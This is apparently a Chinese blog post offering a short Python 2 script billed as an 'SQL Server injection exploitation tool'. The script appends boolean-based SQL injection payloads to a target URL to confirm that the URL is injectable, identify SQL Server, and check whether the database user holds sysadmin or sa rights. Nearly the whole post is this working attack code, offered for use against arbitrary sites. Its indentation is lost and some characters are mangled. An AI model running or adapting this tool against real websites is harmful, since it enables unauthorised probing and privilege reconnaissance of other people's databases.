無聊的時候，用Python寫的一個小程序，用有注入點的鏈接，檢測當前數(shù)據(jù)庫用戶是否為sa，沒什么技術含量。

# Code by zhaoxiaobu Email: little.bu@hotmail.com

#-*- coding: UTF-8 -*-

from sys import exit

from urllib import urlopen

from string import join,strip

from re import search

def is_sqlable():

sql1="%20and%201=2"

sql2="%20and%201=1"

urlfile1=urlopen(url+sql1)

urlfile2=urlopen(url+sql2)

htmlcodes1=urlfile1.read()

htmlcodes2=urlfile2.read()

if not search(judge,htmlcodes1) and search(judge,htmlcodes2):

print "[信息]恭喜!這個URL是有注入漏洞的!n"

print "[信息]現(xiàn)在判斷數(shù)據(jù)庫是否是SQL Server,請耐心等候....."

is_SQLServer()

else:

print "[錯誤]你確定這個URL能用?換個別的試試吧!n"

def is_SQLServer():

sql = "%20and%20exists%20(select%20*%20from%20sysobjects)"

urlfile=urlopen(url+sql)

htmlcodes=urlfile.read()

if not search(judge,htmlcodes):

print "[錯誤]數(shù)據(jù)庫好像不是SQL Server的!n"

else:

print "[信息]確認是SQL Server數(shù)據(jù)庫!n"

print "[信息]開始檢測當前數(shù)據(jù)庫用戶權限,請耐心等待......"

is_sysadmin()

def is_sysadmin():

sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))"

urlfile = urlopen(url+sql)

htmlcodes = urlfile.read()

if not search(judge,htmlcodes):

print "[錯誤]當前數(shù)據(jù)庫用戶不具有sysadmin權限!n"

else:

print "[信息]當前數(shù)據(jù)庫用戶具有sysadmin權限!n"

print "[信息]檢測當前用戶是不是SA,請耐心等待......"

is_sa()

def is_sa():

sql = "%20and%20'sa'=(select%20System_user)";

urlfile = urlopen(url+sql)

htmlcodes = urlfile.read()

if not search(judge,htmlcodes):

print "[錯誤]當前數(shù)據(jù)庫用戶不是SA!n"

else:

print "[信息]當前數(shù)據(jù)庫用戶是SA!n"

print "n########################################################################n"

print " ^o^SQL Server注入利用工具^o^ "

print " Email: little.bu@hotmail.comn"

print "========================================================================";

url = raw_input('[信息]請輸入一個可能有注入漏洞的鏈接!nURL:')

if url == '':

print "[錯誤]提供的URL必須具有 '.asp?xxx=' 這樣的格式"

exit(1)

judge = raw_input("[信息]請?zhí)峁┮粋€判斷字符串.n判斷字符串:")

if judge == '':

print "[錯誤]判斷字符串不能為空!"

exit(1)

is_sqlable()

更多信息請查看IT技術專欄